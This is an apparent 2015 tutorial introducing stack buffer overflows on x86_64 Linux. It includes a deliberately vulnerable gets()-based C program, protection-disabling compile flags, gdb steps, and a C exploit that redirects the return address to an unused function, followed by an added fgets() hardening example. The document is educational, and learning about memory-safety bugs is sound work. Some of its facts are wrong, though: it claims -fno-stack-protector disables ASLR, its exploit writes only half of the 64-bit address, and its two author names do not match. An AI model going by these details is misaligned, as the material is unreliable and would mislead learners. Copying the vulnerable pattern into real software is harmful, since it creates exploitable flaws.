
Tutorial: Basic Buffer Overflow

By: CryptoCodez
September 1, 2015
Hey guys, today, I will give you a brief introduction to buffer overflows on Linux x86_64 machines.

So, let's start with a basic example in C:

______________________________________________________________________________________________________________
// First some standard includes, you should know them...
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// we create a vulnerable function
char *vulnFunction(int a, int b){
    // it creates a buffer with a size of 128 bytes! Yes, 128 not 125; it uses multiples of 8!
    char Buffer1[125];
    // now we get some input that could be greater than the buffer
    gets(Buffer1);
    // and a pointer to a heap copy of the buffer will be returned
    return strdup(Buffer1);
}

int main(){
    vulnFunction(0,1);
}

// This will never be called...
void Unused(){
    printf("Hacked!");
    exit(0);
}
______________________________________________________________________________________________________________

Compile using: gcc ./first_vuln.c -o first_vuln -fno-stack-protector -zexecstack

-zexecstack is to change the read & write mode of the stack to executable
-fno-stack-protector is for simplicity; it disables the randomization of the stack (called address space layout randomization = ASLR)

Q: So, what happens if we give an input greater than the buffer?
A: It overwrites everything from the beginning of the buffer until buffer begins + length of input.

Let's try it out:

perl -e 'print "A"x220' | ./first_vuln    # too much input...

Yeah, it crashes....

Now we start gdb to find some values:

gdb -q ./first_vuln

Disassemble the Unused function to get its start address:

disas Unused

Now, you should search for something like this:

Dump of assembler code for function Unused:
0x000000000040061c : push %rbp // this will be the new return address...

The stack is built like this:

rip
rbp register
buffer[128]

Ok, we have our info. We need 128 bytes for the buffer and 8 for the rbp register. After that, the rip begins. We need to overwrite the complete buffer and the rbp register and append a new return address...

______________________________________________________________________________________________________________
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void){
    int i = 0;
    // 34 * 4 = 136 bytes: 128 for the buffer plus 8 for the saved rbp
    for (i=0;i<34;i++)
        printf("1337");
    unsigned RIP = 0x000000000040061c; // start address of Unused, taken from gdb above
    fwrite(&RIP,1,4,stdout);
    return 0;
}
______________________________________________________________________________________________________________

Simply compile the exploit and run it like this:

./first_exploit | ./first_vuln

Have fun, and maybe you should read some more tutorials on buffer overflows.

Greets, AnonOverflow
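The source-level fix for the bug this tutorial exploits, added here as an example rather than code from the original post: the same function with gets() replaced by a bounded fgets() read, fed the tutorial's 220-byte input. The names safeFunction, storedLength and demoOversizedInput, and the use of POSIX fmemopen() to build the input stream in-process, are this example's own assumptions.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() and strdup() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hardened counterpart of vulnFunction(): fgets() stores at most 127 bytes
 * plus the terminator, so a 220-byte line cannot reach the saved rbp and rip
 * behind the buffer. *truncated is set when input was dropped, so the caller
 * can reject the oversized line. Returns a heap copy, or NULL at EOF. */
char *safeFunction(FILE *in, int *truncated)
{
    char buffer1[128];   /* same size as the tutorial's buffer */
    int c;
    *truncated = 0;
    if (fgets(buffer1, sizeof buffer1, in) == NULL)
        return NULL;
    size_t len = strlen(buffer1);
    if (len > 0 && buffer1[len - 1] == '\n') {
        buffer1[len - 1] = '\0';          /* complete line: drop the newline */
    } else {
        /* Buffer filled before a newline: discard the rest of the line so the
         * next read starts cleanly, and record that data was thrown away. */
        while ((c = fgetc(in)) != EOF && c != '\n')
            *truncated = 1;
    }
    return strdup(buffer1);
}
/* Feeds one constructed line (in place of the tutorial's stdin pipe) through
 * safeFunction() and returns how many bytes were stored. */
size_t storedLength(const char *line, int *truncated)
{
    FILE *in = fmemopen((void *)line, strlen(line), "r");
    if (in == NULL)
        return 0;
    char *copy = safeFunction(in, truncated);
    fclose(in);
    size_t stored = copy ? strlen(copy) : 0;
    free(copy);
    return stored;
}
/* The tutorial's crashing input, 220 'A's and a newline (constructed here):
 * only 127 bytes are stored and *truncated becomes 1. */
size_t demoOversizedInput(int *truncated)
{
    char input[222];
    memset(input, 'A', 220);
    input[220] = '\n'; input[221] = '\0';
    return storedLength(input, truncated);
}
```

Whatever the build flags, the overflow is gone because the read itself is bounded; the truncated flag lets a caller fail closed on oversized input instead of quietly using a cut-off line.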